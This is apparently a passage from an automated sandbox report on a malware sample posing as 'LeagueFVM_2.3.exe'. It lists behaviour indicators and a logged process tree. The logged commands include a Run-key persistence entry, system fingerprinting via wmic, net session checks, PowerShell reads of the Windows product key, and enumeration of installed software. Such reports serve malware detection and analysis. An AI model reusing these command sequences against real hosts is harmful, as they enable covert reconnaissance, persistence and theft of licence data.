| Set value (str) | \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupO0k1mr = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\LeagueFVM_2.3.exe" | C:\Windows\system32\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe
"C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1848 get ExecutablePath"
C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe
"C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\servilities" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1904 --field-trial-handle=1908,i,5494928364512144148,9462003259317771183,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe
"C:\Users\Admin\AppData\Local\Temp\LeagueFVM_2.3.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\servilities" --mojo-platform-channel-handle=2064 --field-trial-handle=1908,i,5494928364512144148,9462003259317771183,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1848 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\net.exe
net session
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1848 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1848 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
C:\Windows\system32\cmd.exe
